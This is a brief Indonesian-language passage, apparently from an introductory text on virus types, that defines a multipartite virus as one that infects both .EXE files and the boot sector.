Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file- file *.EXE dan juga menginfeksi Boot Sector.